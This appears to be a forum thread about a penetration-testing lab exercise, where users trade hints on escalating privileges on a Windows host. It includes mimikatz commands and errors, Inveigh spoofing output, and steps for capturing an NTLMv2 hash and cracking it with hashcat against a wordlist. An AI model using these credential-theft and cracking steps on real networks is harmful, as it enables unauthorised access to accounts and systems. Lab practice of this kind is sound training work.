Hi, on MS01 machine, I added ilfserveradm
to local administrators group, but I am unable to get “privilege::debug” “OK” with mimikatz.
This is the error I get:
mimikatz # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
mimikatz # privilege::debug
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061
mimikatz #
Any suggestion? Thankyou!
Did you solve it? I am stuck at the same place.
sisobe
January 21, 2023, 6:37pm
3
worked for me neither, but
try using netcat with the bat.file
it will work
If anyone else has same issue, you need to logout then back in.
1 Like
I am performing all the steps mentioned to add ilfserveradm to administrators group but it is not working. Can please someone help?
Hey guys i got the admin and everything but i m stuck with the last flag i imported inveigh but when i execute it i keep getting the following error :
PS C:\tmp\Inveigh> Import-Module .\Inveigh.ps1
Import-Module .\Inveigh.ps1
PS C:\tmp\Inveigh> Invoke-Inveigh -ConsoleOutput Y -FileOutput Y
Invoke-Inveigh -ConsoleOutput Y -FileOutput Y
[*] Inveigh 1.506 started at 2023-06-08T03:45:44
[+] Elevated Privilege Mode = Enabled
[+] Primary IP Address = 172.16.8.50
[+] Spoofer IP Address = 172.16.8.50
[+] ADIDNS Spoofer = Disabled
[+] DNS Spoofer = Enabled
[+] DNS TTL = 30 Seconds
[+] LLMNR Spoofer = Enabled
[+] LLMNR TTL = 30 Seconds
[+] mDNS Spoofer = Disabled
[+] NBNS Spoofer = Disabled
[+] SMB Capture = Enabled
[+] HTTP Capture = Enabled
[+] HTTPS Capture = Disabled
[+] HTTP/HTTPS Authentication = NTLM
[+] WPAD Authentication = NTLM
[+] WPAD NTLM Authentication Ignore List = Firefox
[+] WPAD Response = Enabled
[+] Kerberos TGT Capture = Disabled
[+] Machine Account Capture = Disabled
[+] Console Output = Full
[+] File Output = Enabled
[+] Output Directory = C:\tmp\Inveigh
WARNING: [!] Run Stop-Inveigh to stop
[*] Press any key to stop console output
Cannot see if a key has been pressed when either application does not have a console or when console input has been
redirected from a file. Try Console.In.Peek.
At C:\tmp\Inveigh\Inveigh.ps1:6365 char:20
+ if([Console]::KeyAvailable)
+ ~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : OperationStopped: (:) [], InvalidOperationException
+ FullyQualifiedErrorId : System.InvalidOperationException
I looked for what causes the issue but i can’t find anything helpful
beani
August 3, 2023, 7:34pm
7
The changes have to be applied to the system, maybe try a commands like “gpupdate”
2 Likes
beani
August 3, 2023, 9:47pm
8
Could anyone please provide a hint on cracking the ntlmv2 hash (last question)? I am stuck an clearly missing something obvious
Sure so copy over inveigh using: copy \TSCLIENT\home\Inveigh.ps1
Next import the module: Import-Module Inveigh.ps1
Run Inveigh with: Invoke-Inveigh -ConsoleOutput Y -FileOutput Y
Wait until a hash pops up.
You can copy the hash
You can run the following to find the right hashmode: hashcat grep | NTLM
You should use 5600 so your command can basically bethe following:
hashcat -m 5600 “past hash here” /usr/share/wordlists/rockyou.txt
You’ll get the password
beani
August 4, 2023, 8:34pm
10
Hashcat constantly says “Exhausted”, do I have the wrong hash?
beani
August 4, 2023, 8:42pm
11
Nevermind, I in fact really had the wrong hash
All good I’ve done that countless times haha
1 Like
Noob1
September 13, 2023, 4:20pm
13
Can’t seem to do the privilege escalation, tried with adding the user to the administrators group and with nc.exe, if anyone can help would appriciate a dm!
paella
September 15, 2023, 8:45pm
15
hi i can’t connect to backupadm
If anyone has trouble with this in future, start a cmd prompt as admin… then when you come to put in the username do .\ilfserveradm → this uses local authentication as we’re local admin. Don’t wan tto authenticate against the domain
5 Likes
emdeh
October 9, 2023, 10:44pm
17
great advice the .\
before the username will make it sign in with the local admin account instead of the domain one.
Also, make sure you run mimikatz from an elevated cmd line. that stumped me for a while too.
1 Like
how did you get it to work im stuck please help someone